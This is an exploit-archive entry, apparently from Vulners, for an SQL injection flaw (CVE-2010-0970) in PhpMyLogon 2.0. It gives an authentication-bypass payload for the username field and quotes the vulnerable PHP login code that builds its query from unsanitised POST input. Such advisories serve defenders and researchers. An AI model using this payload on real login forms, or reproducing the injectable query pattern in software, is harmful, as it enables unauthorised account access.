PhpMyLogon 2.0 - SQL Injection
| Reporter | Title | Published | Views | Family All 6 |
|---|---|---|---|---|
| CVE-2010-0970 | 14 Mar 201000:00 | – | circl | |
| CVE-2010-0970 | 16 Mar 201018:26 | – | cve | |
| CVE-2010-0970 | 16 Mar 201018:26 | – | cvelist | |
| EUVD-2010-0995 | 7 Oct 202500:30 | – | euvd | |
| CVE-2010-0970 | 16 Mar 201019:00 | – | nvd | |
| Sql injection | 16 Mar 201019:00 | – | prion |
# Exploit Title: PhpMyLogon SQL Injection
# Date: March 14, 2010
# Author: Blake
# Software Link: http://sourceforge.net/projects/phpmylogon/files/PhpMyLogon/PhpMyLogon%202/phpmylogon2.zip/download
# Version: 2
# Tested on: Windows XP SP3
Proof of Concept:
Enter the following for the username to login as the first user:
blake' or '1'='1' #
and anything for the password.
Vulnerable Code:
if(isset($_POST['submit'])) {
if($_POST['username'] != "" AND $_POST['password'] != "") {
// Check submitted data with data in database
$sql = "SELECT id,username,password,cookie_pass,actcode,rank FROM `".$settings['db_table']."` WHERE username = '".$_POST['username']."' LIMIT 1";
$query = mysql_query($sql);Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Mar 2010 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.00981